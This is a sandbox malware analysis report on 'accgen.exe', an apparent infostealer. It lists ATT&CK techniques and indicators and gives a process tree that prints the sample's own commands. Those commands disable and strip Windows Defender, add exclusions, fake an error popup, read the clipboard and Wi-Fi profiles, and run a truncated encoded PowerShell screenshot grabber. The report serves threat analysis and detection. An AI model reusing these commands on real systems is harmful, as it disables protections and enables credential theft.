2b48a65306f5b0c5cc4d23e902277c067f3a288892771bc7dffd225882214295

Resubmissions

04/12/2024, 04:21

241204-eymbza1qgy 10

04/12/2024, 04:20

241204-eya9ps1qfw 10

Analysis

max time kernel
93s
max time network
95s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
04/12/2024, 04:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

accgen.exe
Size

7.5MB
MD5

a67d509f43e7644fc0e19982afb5e78b
SHA1

e7793b425aaf522ae16e46d1b1208ff47b795e6c
SHA256

2b48a65306f5b0c5cc4d23e902277c067f3a288892771bc7dffd225882214295
SHA512

2aac62fafb430156b17f69bcca4b3e6f16a05eb42ed895e2ce10e0cd14e114cffb92c6328660460f01c132acc168e345db91a5ecf3856f8b98ca29b08ff7ee22
SSDEEP

196608:afQCwVUurErvI9pWjgN3ZdahF0pbH1AY7WtQsNo/03vC1n:nVUurEUWjqeWx06rYYn

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1336	powershell.exe
904	powershell.exe
4492	powershell.exe
2412	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	accgen.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3564	cmd.exe
1480	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2412	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe
3900	accgen.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
864	tasklist.exe
2484	tasklist.exe
4616	tasklist.exe
240	tasklist.exe
3892	tasklist.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ab43-22.dat	upx
behavioral1/memory/3900-25-0x00007FFC2A430000-0x00007FFC2AAF4000-memory.dmp	upx
behavioral1/files/0x001900000002ab39-48.dat	upx
behavioral1/files/0x001c00000002ab38-47.dat	upx
behavioral1/files/0x001900000002ab37-46.dat	upx
behavioral1/files/0x001900000002ab34-45.dat	upx
behavioral1/files/0x001900000002ab33-44.dat	upx
behavioral1/files/0x001c00000002ab32-43.dat	upx
behavioral1/files/0x001900000002ab31-42.dat	upx
behavioral1/files/0x001a00000002ab2d-41.dat	upx
behavioral1/memory/3900-60-0x00007FFC3BBA0000-0x00007FFC3BD1F000-memory.dmp	upx
behavioral1/files/0x001900000002ab49-59.dat	upx
behavioral1/memory/3900-58-0x00007FFC3C080000-0x00007FFC3C0A4000-memory.dmp	upx
behavioral1/memory/3900-62-0x00007FFC3C280000-0x00007FFC3C299000-memory.dmp	upx
behavioral1/files/0x001c00000002ab3e-68.dat	upx
behavioral1/memory/3900-74-0x00007FFC3F020000-0x00007FFC3F045000-memory.dmp	upx
behavioral1/memory/3900-76-0x00007FFC3B500000-0x00007FFC3B514000-memory.dmp	upx
behavioral1/memory/3900-81-0x00007FFC30670000-0x00007FFC3078B000-memory.dmp	upx
behavioral1/memory/3900-105-0x00007FFC3C080000-0x00007FFC3C0A4000-memory.dmp	upx
behavioral1/memory/3900-259-0x00007FFC3C280000-0x00007FFC3C299000-memory.dmp	upx
behavioral1/memory/3900-261-0x00007FFC3B400000-0x00007FFC3B433000-memory.dmp	upx
behavioral1/memory/3900-297-0x00007FFC3B330000-0x00007FFC3B3FD000-memory.dmp	upx
behavioral1/memory/3900-299-0x00007FFC29F00000-0x00007FFC2A429000-memory.dmp	upx
behavioral1/memory/3900-173-0x00007FFC3BBA0000-0x00007FFC3BD1F000-memory.dmp	upx
behavioral1/memory/3900-300-0x00007FFC2A430000-0x00007FFC2AAF4000-memory.dmp	upx
behavioral1/memory/3900-314-0x00007FFC30670000-0x00007FFC3078B000-memory.dmp	upx
behavioral1/memory/3900-306-0x00007FFC3BBA0000-0x00007FFC3BD1F000-memory.dmp	upx
behavioral1/memory/3900-301-0x00007FFC3F020000-0x00007FFC3F045000-memory.dmp	upx
behavioral1/memory/3900-80-0x00007FFC3C420000-0x00007FFC3C43A000-memory.dmp	upx
behavioral1/files/0x001c00000002ab4a-79.dat	upx
behavioral1/memory/3900-78-0x00007FFC447F0000-0x00007FFC447FD000-memory.dmp	upx
behavioral1/memory/3900-73-0x00007FFC29F00000-0x00007FFC2A429000-memory.dmp	upx
behavioral1/memory/3900-71-0x00007FFC3B330000-0x00007FFC3B3FD000-memory.dmp	upx
behavioral1/memory/3900-70-0x00007FFC2A430000-0x00007FFC2AAF4000-memory.dmp	upx
behavioral1/files/0x001900000002ab40-67.dat	upx
behavioral1/memory/3900-66-0x00007FFC3B400000-0x00007FFC3B433000-memory.dmp	upx
behavioral1/memory/3900-64-0x00007FFC45630000-0x00007FFC4563D000-memory.dmp	upx
behavioral1/files/0x001900000002ab46-63.dat	upx
behavioral1/memory/3900-56-0x00007FFC3C420000-0x00007FFC3C43A000-memory.dmp	upx
behavioral1/memory/3900-54-0x00007FFC3EFF0000-0x00007FFC3F01D000-memory.dmp	upx
behavioral1/memory/3900-32-0x00007FFC457C0000-0x00007FFC457CF000-memory.dmp	upx
behavioral1/files/0x001900000002ab3f-31.dat	upx
behavioral1/memory/3900-29-0x00007FFC3F020000-0x00007FFC3F045000-memory.dmp	upx
behavioral1/files/0x001900000002ab2e-28.dat	upx
behavioral1/memory/3900-327-0x00007FFC3B500000-0x00007FFC3B514000-memory.dmp	upx
behavioral1/memory/3900-342-0x00007FFC30670000-0x00007FFC3078B000-memory.dmp	upx
behavioral1/memory/3900-341-0x00007FFC447F0000-0x00007FFC447FD000-memory.dmp	upx
behavioral1/memory/3900-340-0x00007FFC3B400000-0x00007FFC3B433000-memory.dmp	upx
behavioral1/memory/3900-339-0x00007FFC3B330000-0x00007FFC3B3FD000-memory.dmp	upx
behavioral1/memory/3900-338-0x00007FFC45630000-0x00007FFC4563D000-memory.dmp	upx
behavioral1/memory/3900-337-0x00007FFC3C280000-0x00007FFC3C299000-memory.dmp	upx
behavioral1/memory/3900-336-0x00007FFC3BBA0000-0x00007FFC3BD1F000-memory.dmp	upx
behavioral1/memory/3900-335-0x00007FFC3C080000-0x00007FFC3C0A4000-memory.dmp	upx
behavioral1/memory/3900-334-0x00007FFC3C420000-0x00007FFC3C43A000-memory.dmp	upx
behavioral1/memory/3900-333-0x00007FFC3EFF0000-0x00007FFC3F01D000-memory.dmp	upx
behavioral1/memory/3900-332-0x00007FFC457C0000-0x00007FFC457CF000-memory.dmp	upx
behavioral1/memory/3900-331-0x00007FFC3F020000-0x00007FFC3F045000-memory.dmp	upx
behavioral1/memory/3900-330-0x00007FFC29F00000-0x00007FFC2A429000-memory.dmp	upx
behavioral1/memory/3900-315-0x00007FFC2A430000-0x00007FFC2AAF4000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1176	netsh.exe
3320	cmd.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3092	WMIC.exe
4252	WMIC.exe
468	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1872	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1336	powershell.exe
2412	powershell.exe
1336	powershell.exe
2412	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1972	powershell.exe
1972	powershell.exe
1972	powershell.exe
904	powershell.exe
904	powershell.exe
3856	powershell.exe
3856	powershell.exe
4492	powershell.exe
4492	powershell.exe
5104	powershell.exe
5104	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	864	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2680	WMIC.exe
Token: SeSecurityPrivilege	2680	WMIC.exe
Token: SeTakeOwnershipPrivilege	2680	WMIC.exe
Token: SeLoadDriverPrivilege	2680	WMIC.exe
Token: SeSystemProfilePrivilege	2680	WMIC.exe
Token: SeSystemtimePrivilege	2680	WMIC.exe
Token: SeProfSingleProcessPrivilege	2680	WMIC.exe
Token: SeIncBasePriorityPrivilege	2680	WMIC.exe
Token: SeCreatePagefilePrivilege	2680	WMIC.exe
Token: SeBackupPrivilege	2680	WMIC.exe
Token: SeRestorePrivilege	2680	WMIC.exe
Token: SeShutdownPrivilege	2680	WMIC.exe
Token: SeDebugPrivilege	2680	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2680	WMIC.exe
Token: SeRemoteShutdownPrivilege	2680	WMIC.exe
Token: SeUndockPrivilege	2680	WMIC.exe
Token: SeManageVolumePrivilege	2680	WMIC.exe
Token: 33	2680	WMIC.exe
Token: 34	2680	WMIC.exe
Token: 35	2680	WMIC.exe
Token: 36	2680	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2680	WMIC.exe
Token: SeSecurityPrivilege	2680	WMIC.exe
Token: SeTakeOwnershipPrivilege	2680	WMIC.exe
Token: SeLoadDriverPrivilege	2680	WMIC.exe
Token: SeSystemProfilePrivilege	2680	WMIC.exe
Token: SeSystemtimePrivilege	2680	WMIC.exe
Token: SeProfSingleProcessPrivilege	2680	WMIC.exe
Token: SeIncBasePriorityPrivilege	2680	WMIC.exe
Token: SeCreatePagefilePrivilege	2680	WMIC.exe
Token: SeBackupPrivilege	2680	WMIC.exe
Token: SeRestorePrivilege	2680	WMIC.exe
Token: SeShutdownPrivilege	2680	WMIC.exe
Token: SeDebugPrivilege	2680	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2680	WMIC.exe
Token: SeRemoteShutdownPrivilege	2680	WMIC.exe
Token: SeUndockPrivilege	2680	WMIC.exe
Token: SeManageVolumePrivilege	2680	WMIC.exe
Token: 33	2680	WMIC.exe
Token: 34	2680	WMIC.exe
Token: 35	2680	WMIC.exe
Token: 36	2680	WMIC.exe
Token: SeIncreaseQuotaPrivilege	468	WMIC.exe
Token: SeSecurityPrivilege	468	WMIC.exe
Token: SeTakeOwnershipPrivilege	468	WMIC.exe
Token: SeLoadDriverPrivilege	468	WMIC.exe
Token: SeSystemProfilePrivilege	468	WMIC.exe
Token: SeSystemtimePrivilege	468	WMIC.exe
Token: SeProfSingleProcessPrivilege	468	WMIC.exe
Token: SeIncBasePriorityPrivilege	468	WMIC.exe
Token: SeCreatePagefilePrivilege	468	WMIC.exe
Token: SeBackupPrivilege	468	WMIC.exe
Token: SeRestorePrivilege	468	WMIC.exe
Token: SeShutdownPrivilege	468	WMIC.exe
Token: SeDebugPrivilege	468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	468	WMIC.exe
Token: SeRemoteShutdownPrivilege	468	WMIC.exe
Token: SeUndockPrivilege	468	WMIC.exe
Token: SeManageVolumePrivilege	468	WMIC.exe
Token: 33	468	WMIC.exe
Token: 34	468	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2308 wrote to memory of 3900	2308	accgen.exe	77
PID 2308 wrote to memory of 3900	2308	accgen.exe	77
PID 3900 wrote to memory of 488	3900	accgen.exe	78
PID 3900 wrote to memory of 488	3900	accgen.exe	78
PID 3900 wrote to memory of 3496	3900	accgen.exe	79
PID 3900 wrote to memory of 3496	3900	accgen.exe	79
PID 3900 wrote to memory of 3308	3900	accgen.exe	80
PID 3900 wrote to memory of 3308	3900	accgen.exe	80
PID 3900 wrote to memory of 4880	3900	accgen.exe	83
PID 3900 wrote to memory of 4880	3900	accgen.exe	83
PID 3496 wrote to memory of 2412	3496	cmd.exe	86
PID 3496 wrote to memory of 2412	3496	cmd.exe	86
PID 488 wrote to memory of 1336	488	cmd.exe	87
PID 488 wrote to memory of 1336	488	cmd.exe	87
PID 4880 wrote to memory of 864	4880	cmd.exe	88
PID 4880 wrote to memory of 864	4880	cmd.exe	88
PID 3900 wrote to memory of 2788	3900	accgen.exe	89
PID 3900 wrote to memory of 2788	3900	accgen.exe	89
PID 2788 wrote to memory of 2680	2788	cmd.exe	91
PID 2788 wrote to memory of 2680	2788	cmd.exe	91
PID 3308 wrote to memory of 5068	3308	cmd.exe	92
PID 3308 wrote to memory of 5068	3308	cmd.exe	92
PID 3900 wrote to memory of 400	3900	accgen.exe	94
PID 3900 wrote to memory of 400	3900	accgen.exe	94
PID 400 wrote to memory of 4732	400	cmd.exe	96
PID 400 wrote to memory of 4732	400	cmd.exe	96
PID 3900 wrote to memory of 1964	3900	accgen.exe	97
PID 3900 wrote to memory of 1964	3900	accgen.exe	97
PID 1964 wrote to memory of 1248	1964	cmd.exe	99
PID 1964 wrote to memory of 1248	1964	cmd.exe	99
PID 3900 wrote to memory of 4164	3900	accgen.exe	100
PID 3900 wrote to memory of 4164	3900	accgen.exe	100
PID 4164 wrote to memory of 468	4164	cmd.exe	102
PID 4164 wrote to memory of 468	4164	cmd.exe	102
PID 3900 wrote to memory of 2000	3900	accgen.exe	103
PID 3900 wrote to memory of 2000	3900	accgen.exe	103
PID 2000 wrote to memory of 3092	2000	cmd.exe	143
PID 2000 wrote to memory of 3092	2000	cmd.exe	143
PID 3900 wrote to memory of 3420	3900	accgen.exe	107
PID 3900 wrote to memory of 3420	3900	accgen.exe	107
PID 3900 wrote to memory of 4192	3900	accgen.exe	106
PID 3900 wrote to memory of 4192	3900	accgen.exe	106
PID 3900 wrote to memory of 2328	3900	accgen.exe	110
PID 3900 wrote to memory of 2328	3900	accgen.exe	110
PID 3900 wrote to memory of 3564	3900	accgen.exe	112
PID 3900 wrote to memory of 3564	3900	accgen.exe	112
PID 3420 wrote to memory of 3892	3420	cmd.exe	114
PID 3420 wrote to memory of 3892	3420	cmd.exe	114
PID 4192 wrote to memory of 2484	4192	cmd.exe	115
PID 4192 wrote to memory of 2484	4192	cmd.exe	115
PID 2328 wrote to memory of 4620	2328	cmd.exe	116
PID 2328 wrote to memory of 4620	2328	cmd.exe	116
PID 3564 wrote to memory of 1480	3564	cmd.exe	117
PID 3564 wrote to memory of 1480	3564	cmd.exe	117
PID 3900 wrote to memory of 2216	3900	accgen.exe	118
PID 3900 wrote to memory of 2216	3900	accgen.exe	118
PID 3900 wrote to memory of 2468	3900	accgen.exe	120
PID 3900 wrote to memory of 2468	3900	accgen.exe	120
PID 3900 wrote to memory of 3320	3900	accgen.exe	121
PID 3900 wrote to memory of 3320	3900	accgen.exe	121
PID 3900 wrote to memory of 2836	3900	accgen.exe	123
PID 3900 wrote to memory of 2836	3900	accgen.exe	123
PID 2468 wrote to memory of 1120	2468	cmd.exe	126
PID 2468 wrote to memory of 1120	2468	cmd.exe	126

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3144	attrib.exe
3436	attrib.exe

C:\Users\Admin\AppData\Local\Temp\accgen.exe
"C:\Users\Admin\AppData\Local\Temp\accgen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2308
- C:\Users\Admin\AppData\Local\Temp\accgen.exe
  "C:\Users\Admin\AppData\Local\Temp\accgen.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\accgen.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:488
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\accgen.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Try reinstalling', 0, 'Random error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3308
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Try reinstalling', 0, 'Random error', 0+16);close()"
      4⤵
      PID:5068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4880
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2788
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:400
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1964
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4164
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4192
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3420
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2328
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2216
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2468
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3320
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2836
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:844
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAI